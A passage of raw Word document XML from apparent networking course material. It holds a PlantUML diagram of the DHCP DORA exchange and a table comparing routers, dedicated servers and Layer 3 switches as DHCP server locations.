                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>@startuml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09DB27B2" w14:textId="77777777" w:rsidR="00892607" w:rsidRPr="00892607" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00892607">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>title DHCP DORA Process</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="378E8825" w14:textId="77777777" w:rsidR="00892607" w:rsidRPr="00892607" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7209BAEC" w14:textId="77777777" w:rsidR="00892607" w:rsidRPr="00892607" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00892607">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>participant "DHCP Client\n(No IP)" as client</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A54D482" w14:textId="77777777" w:rsidR="00892607" w:rsidRPr="00892607" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00892607">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>participant "Network" as network</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23698B45" w14:textId="77777777" w:rsidR="00892607" w:rsidRPr="00892607" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00892607">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>participant "DHCP Server\n192.168.1.1" as server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23109C47" w14:textId="77777777" w:rsidR="00892607" w:rsidRPr="00892607" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4F480AD6" w14:textId="77777777" w:rsidR="00892607" w:rsidRPr="00892607" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00892607">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>client -&gt; network : 1. DHCP Discover\n(Broadcast: 255.255.255.255)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19D492AE" w14:textId="77777777" w:rsidR="00892607" w:rsidRPr="00892607" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00892607">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>network -&gt; server : Forward Discover</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B0BD603" w14:textId="77777777" w:rsidR="00892607" w:rsidRPr="00892607" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="601DD86D" w14:textId="77777777" w:rsidR="00892607" w:rsidRPr="00892607" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00892607">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>server -&gt; network : 2. DHCP Offer\n(IP: 192.168.1.150)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7404B54C" w14:textId="77777777" w:rsidR="00892607" w:rsidRPr="00892607" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00892607">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>network -&gt; client : Forward Offer</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73AC0D6E" w14:textId="77777777" w:rsidR="00892607" w:rsidRPr="00892607" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2A8C39A9" w14:textId="77777777" w:rsidR="00892607" w:rsidRPr="00892607" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00892607">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>client -&gt; network : 3. DHCP Request\n(Request: 192.168.1.150)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="608CD63E" w14:textId="77777777" w:rsidR="00892607" w:rsidRPr="00892607" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00892607">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>network -&gt; server : Forward Request</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1603FE2A" w14:textId="77777777" w:rsidR="00892607" w:rsidRPr="00892607" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="323A4B7A" w14:textId="77777777" w:rsidR="00892607" w:rsidRPr="00892607" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00892607">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>server -&gt; network : 4. DHCP Acknowledge\n(Confirm: 192.168.1.150)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="016E6655" w14:textId="77777777" w:rsidR="00892607" w:rsidRPr="00892607" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00892607">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>network -&gt; client : Forward ACK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03588AA6" w14:textId="77777777" w:rsidR="00892607" w:rsidRPr="00892607" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="76CBA585" w14:textId="77777777" w:rsidR="00892607" w:rsidRPr="00892607" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00892607">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of client : Client now has:\n• IP: 192.168.1.150\n• Mask: 255.255.255.0\n• Gateway: 192.168.1.1\n• DNS: 8.8.8.8\n• Lease: 24 hours</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D99D2E3" w14:textId="77777777" w:rsidR="00892607" w:rsidRPr="00892607" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="113C3AE4" w14:textId="77777777" w:rsidR="00892607" w:rsidRPr="00892607" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00892607">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of server : Server records:\n• Client MAC address\n• Assigned IP\n• Lease start time\n• Lease duration</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B5007FF" w14:textId="4EABEA02" w:rsidR="00FF6B95" w:rsidRPr="00953178" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00892607">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>@enduml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63BCBB72" w14:textId="5205775E" w:rsidR="00953178" w:rsidRDefault="00F06EEA" w:rsidP="00B24A30">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r w:rsidR="004C29E6">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r w:rsidR="00B24A30">
        <w:t xml:space="preserve"> DHCP Server</w:t>
      </w:r>
      <w:r w:rsidR="004C29E6">
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBAFCC1" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
      <w:r w:rsidRPr="00F6497A">
        <w:t>DHCP servers can be deployed on various network devices depending on network size and requirements:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2450"/>
        <w:gridCol w:w="2337"/>
        <w:gridCol w:w="3240"/>
        <w:gridCol w:w="3961"/>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="2628"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F6497A" w:rsidRPr="00F6497A" w14:paraId="67B8CBC0" w14:textId="77777777" w:rsidTr="00F6497A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C7F5F10" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="668" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D6ED8AE" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Network Size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="926" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="507B6C64" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1132" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29FA28CC" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="823" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CFBE63C" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Advantages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="751" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66BC7A9D" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Disadvantages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F6497A" w:rsidRPr="00F6497A" w14:paraId="039E5342" w14:textId="77777777" w:rsidTr="00F6497A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="376D621D" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>Router</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="668" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A59B272" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>Home/Small Office</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="926" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E1FBD4B" w14:textId="58044774" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>Most common</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1132" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02ADC615" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>Linksys, Netgear, TP-Link home routers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="823" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F94D351" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>• Built-in functionality</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• Cost-effective</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• Easy to configure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="751" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B7BB366" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>• Limited scalability</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• Single point of failure</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• Basic features only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F6497A" w:rsidRPr="00F6497A" w14:paraId="79C6E4E9" w14:textId="77777777" w:rsidTr="00F6497A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BECC08C" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>Dedicated Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="668" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74A3B630" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>Medium to Large Enterprise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="926" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47914F0A" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>High-availability networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1132" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C92195C" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>Windows Server, Linux ISC DHCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="823" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BE3B962" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>• High performance</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• Advanced features</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• Redundancy options</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="751" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A4BD212" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>• Higher cost</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• Requires management</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• Separate hardware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F6497A" w:rsidRPr="00F6497A" w14:paraId="4EC8BD72" w14:textId="77777777" w:rsidTr="00F6497A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E48BFD2" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>Layer 3 Switch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="668" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27F3BAD3" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>Campus/Enterprise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="926" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C52FAD5" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>Multi-VLAN environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1132" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="266D907A" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>Cisco Catalyst, HP ProCurve</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="823" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="544C5CA7" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>• Multiple VLAN support</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• High port density</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• Centralized management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="751" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="108B65B0" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>• Complex configuration</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• Vendor-specific</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• Higher cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F6497A" w:rsidRPr="00F6497A" w14:paraId="329F9576" w14:textId="77777777" w:rsidTr="00F6497A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="pct"/>
